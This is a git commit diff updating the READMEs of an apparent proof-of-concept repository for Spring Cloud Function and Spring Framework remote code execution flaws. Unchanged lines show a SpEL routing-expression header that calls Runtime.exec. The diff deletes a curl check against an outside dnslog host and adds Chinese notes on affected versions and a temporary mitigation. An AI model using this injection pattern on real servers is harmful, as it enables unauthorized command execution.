update readme

2022-03-30 11:51:46 +08:00 · 2022-03-30 11:51:46 +08:00 · 2670bf1b6b
commit 2670bf1b6b
parent eb33112b95
2 changed files with 11 additions and 7 deletions
--- a/RCE/README.md
+++ b/RCE/README.md
@ -7,6 +7,10 @@ header
 ```
 spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
 ```
+
+## 受影响吧版本
+SpringCloudFunction 3 <= 漏洞版本 <= 3.2.2
+
 # build
 ```bash
 wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
@ -61,11 +65,5 @@ Content-Length: 5
 helloexp
 ```

-## check
-
-```bash
-curl -v 'https://helloexp.com/dnslog?q=random87535.rce.helloexp.com'
-```
-
 ## official GitHub info
 https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
--- a/Core/README.md
+++ b/Core/README.md
@ -8,4 +8,10 @@
 ![尴尬的局面](images/img_1.png)

 ## Spring 官方补丁也正在积极的赶制中  
-[Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
+[Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
+
+## 漏洞影响
+1. jdk 版本在9及以上的
+2. 使用了Spring Framework或衍生框架
+## 漏洞修复建议
+目前，Spring 官方暂未发布补丁，建议降低jdk 版本作为临时方案